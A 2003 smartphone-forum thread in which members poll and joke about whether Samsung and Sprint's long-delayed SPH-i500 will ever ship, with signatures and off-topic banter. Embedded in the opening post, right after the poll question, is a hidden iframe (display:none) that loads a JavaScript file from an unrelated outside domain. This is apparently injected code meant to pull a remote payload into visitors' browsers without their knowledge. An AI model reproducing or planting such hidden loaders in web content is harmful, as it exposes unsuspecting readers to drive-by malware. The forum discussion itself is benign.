Poll: Is the SPH-i500 Dead?

+ Reply to Thread

Question Is the SPH-i500 Dead?

As we now slide off into August oblivion, it's time to ask a truly important question - is the SPH-i500 dead? Not just a dead end, but DOA. If there were warehouses full of these just waiting for the starting gun, the marketing and bean counters at Samsung and Sprint would be going nuts, so that tells me it's a figment of our imaginations. What say you?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by dstrauss; 06-30-2003 at 10:32 AM.
    Dale2 - The "P" in PDA is for Personal. There is no "best" PDA.
    Sprint CDMA Treo 650 since 11/05

Nanotechnology Nerd shadowboxer's Avatar
    Dale

I think that it will arrive in the ER in full code cardiac arrest to no avail.

Nurse: Doc, you've been pumping mr. i5's chest for 2 hours -- give it up
    Dr: No, I gotta keep trying, I know I can bring him around.
    Nurse: Have some dignity, Dr., let him go, his time is past, its just too, late.
    Dr.: Ok, I guess you are right nurse Cratchit, OK, its, 1014am, Monday, July 9th. Call the code. . . . . . . . .

-dale2

dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

Uh, yeah, those are choices?

That's like saying "whose environmental policies are better, George W's, **** Cheney's or Donald Rumsfeld's?"

I understand, you're venting, but you have several other threads to do that on (and you do :/)

dale2

Sooooo right. I've been thinking hard about this, and as an avowed techno-geek, I can't EVER remember lusting over such an antiquated product. This is like waiting for a 486 notebook with Windows 95 in today's market. Aside from an incredible form factor (that's where the lust reallly sits), this thing has NOTHING to recommend it over the year end 2003 offerings on the horizon. Hell, it's a long way behind (technology wise) a Sanyo 8100, HP 2215, and a cable.

Originally posted by ChrisC
    Uh, yeah, those are choices?

That's like saying "whose environmental policies are better, George W's, **** Cheney's or Donald Rumsfeld's?"

I understand, you're venting, but you have several other threads to do that on (and you do :/)
    We've all evolved well past the venting point. If you've followed this product at all, it's been doing a teaser since March 2002 (as the soon to be unveiled "bluechip" phone). Passed FCC clearance in August 2002; officially released by Samsung January 13, 2003; and fish bait ever since. Therefore, there are no other valid choices for a poll such as this one - only the right to speculate as to whether it was truly a product option or not.

Originally posted by shadowboxer
    Dr.: Ok, I guess you are right nurse Cratchit, OK, its, 1014am, Monday, July 9th. Call the code. . . . . . . . .
    Not July 9th, that's my birthday. I don't want the i5 to die on my birthday.

I don't think this is a likely scenario, though. We've just started seeing published reviews of the phone. One thing you have to remember is that to most people, the i500 hasn't really been delayed, because most people won't have heard much about it. Us "geeks" here make up a relatively small group in their market. That all changes now that reviews are being published. Now a larger market will know about it and be interested in it (especially since the reviews I've seen have all been very, very positive). If the i5 was really going to die, those reviews wouldn't be coming out -- remember, any pre-release review would have been done with Sprint's blessing, as that's the only way the reviewer would have a phone to try out.

Add to that the fact that we've seen Sprint execs walking around conferences using the i5 as their phone, and I think it's not likely that this will be scrapped. I can't say why the delay, but I think it's finally coming soon.

-Brian

To Our Moderators:

In all fairness, can you change the last option of this poll to something like "I'm going to stick with the i500" as many have pointed out, this may be a no option poll.

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Shadow/ Dale2 So, i just realized dwhat dale2 means, and theoretically, if you llook at board registration date, you pre-date dstrauss, so technically, your dale 1 and he is dale 2

and for the record, marctronix did pose the Doesn't Exist theory last year - i voted for that one
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

In honor of PHO's superior research skills, I've corrected my signature.

Nanotechnology Nerd shadowboxer's Avatar
    Myself as well

--Dale1

dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

PHO
    Originally posted by shadowboxer
    Myself as well

--Dale1

I think we all need a vacation

I have a Cruise Agency in the family, -

should we do a Smart Phone Forums cruise? i can do discounts for members
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

Originally posted by PHO
    Shadow/ Dale2 So, i just realized dwhat dale2 means, and theoretically, if you llook at board registration date, you pre-date dstrauss, so technically, your dale 1 and he is dale 2
    OK, we officially all need lives.

-Brian

PHO
    Originally posted by bkrodgers
    OK, we officially all need lives.

-Brian
    And with that, the Mele of posts have.

I went to law school at BK Roberts' Hall

your screen name/ handle/ name is freaking me out.

Ahhh Exams, its a never ending nightmare

www.grtalk.com

There is no reason why we should be complaining about the introduction of this phone when 99.999% of the whole country dont even know about its existance!

Thumbs down Re: i500 DOA

I had high hopes for the i500, but the wait, combined -w- no expansion and OS4 have really managed to "cool my ardour". I desperately need to move "up" from my i330 - but I'm starting to think that Sprint only releases new hardware every leapyear....
    Cal Stuart